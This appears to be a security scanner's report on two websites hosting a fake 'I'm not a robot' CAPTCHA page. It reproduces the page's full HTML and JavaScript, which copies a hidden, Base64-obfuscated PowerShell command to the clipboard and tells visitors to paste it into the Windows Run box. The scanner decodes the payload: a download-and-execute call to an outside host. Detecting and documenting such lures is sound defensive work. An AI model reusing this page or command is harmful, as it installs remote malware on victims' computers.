.checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n",
"ThreatLevel": "High"
}
https://www.lucprofessional.grupomoltz.com.br/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "https://www.lucprofessional.grupomoltz.com.br/",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"URLs": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"ClipboardCommands": "POWerShEll -W h ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification",
"Verify You Are Human",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
},
"CaptchaElements": [
"ification ID: <span id=\"verification-id\">146820</span>\"",
"} function hideCaptchaLoading() { che",
"} function hideCaptchaCheckbox() { che",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec",
"let checkboxBtn = document.getElementById(\"checkbox\"); let chec",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri",
"let verifywindow = document.getElementById(\"verify-window\"); functi",
"andomNumber(); document.getElementById('verification-id').textContent = veri",
"ect(); document.execCommand(\"copy\"); doc",
"tempTextArea.select(); docum",
"href=\"https://cdnjs.cloudflare.com/ajax/libs/font-",
"</div> <script> let checkb"
],
"HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n",
"ThreatLevel": "High"
}
https://thesignaturemag.salviatech.com/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "https://thesignaturemag.salviatech.com/",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"URLs": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"ClipboardCommands": "POWerShEll -W h ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification",
"Verify You Are Human",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
},
"CaptchaElements": [
"ification ID: <span id=\"verification-id\">146820</span>\"",
"} function hideCaptchaLoading() { che",
"} function hideCaptchaCheckbox() { che",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec",
"let checkboxBtn = document.getElementById(\"checkbox\"); let chec",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri",
"let verifywindow = document.getElementById(\"verify-window\"); functi",
"andomNumber(); document.getElementById('verification-id').textContent = veri",
"ect(); document.execCommand(\"copy\"); doc",
"tempTextArea.select(); docum",
"href=\"https://cdnjs.cloudflare.com/ajax/libs/font-",
"</div> <script> let checkb"
],
"HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n 